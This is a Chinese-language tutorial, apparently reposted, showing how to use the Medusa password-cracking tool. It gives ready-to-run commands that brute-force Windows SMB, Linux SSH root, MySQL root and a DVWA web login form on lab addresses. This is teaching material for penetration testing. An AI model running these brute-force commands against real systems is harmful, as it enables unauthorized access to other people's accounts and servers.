實例演示之Medusa在線密碼破解


Medusa和hydra一樣,同樣屬於在線密碼破解工具。不同的是,medusa 的穩定性相較於 hydra 要好很多。但是也有缺陷。它的支持模塊要比 hydra 少很多,也不支持 rdp 服務協議。同時,它的表單破解也存在着問題。但是不論什么工具,我們都應取其精華,善於利用。下面讓我們來看看,如何使用它。

首先,我們在終端輸入命令,查看medusa所支持的模塊。
medusa -d

20161001114008

我們可以看到,它支持多達20幾種的模塊。

現在我以破解Windows的smb來做關於Windows密碼破解的演示。輸入命令:

medusa -M smbnt -h 192.168.1.100 -u Eternal -P pass.lst -e ns -F -v 3

-M: 表示你要破解的類型。

-h:目標機器地址。

-u:用戶名。

-e : 嘗試空密碼。

-F:破解成功后立即停止破解。

-v:顯示破解過程。

20161001115954

接着,讓我們來嘗試破解 Linux 的ssh服務密碼。輸入命令:

medusa -M ssh -h 192.168.30.128 -u root -P pass.lst -e ns -F

20161001113250

我們再來破解下該服務器上跑的數據庫密碼。輸入命令:

medusa -M mysql -h 192.168.30.128 -e ns -F -u root -P pass.lst

20161001120739

我們可以看到,密碼很快就被破解。這里用的是空密碼。

最后我們來個表單破解還是以dvwa為例。

破解表單登錄密碼我們要用到web-form 這個模塊。如果你不知道該模塊如何使用,我們可以輸入以下命令來進行查看。

medusa -M web-form -q

-q: 查詢的意思。

20161001121041

下面開始破解。輸入命令:

medusa -h 192.168.30.128 -u admin -P pass.lst -M web-form -m FORM:”dvwa/login.php” -m DENY-SIGNAL:”login.php” -m FORM-DATA:”post?user=username&pass=password&Login=Login”

20161001121703

當我們回車,我們會發現有報錯,密碼並未被成功破解。這是因為medusa本身存在的表單破解缺陷導致的。它不支持正確特征碼的驗證,只支持錯誤的。所以,導致 login.php 和前面的 login.php 起沖突。


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM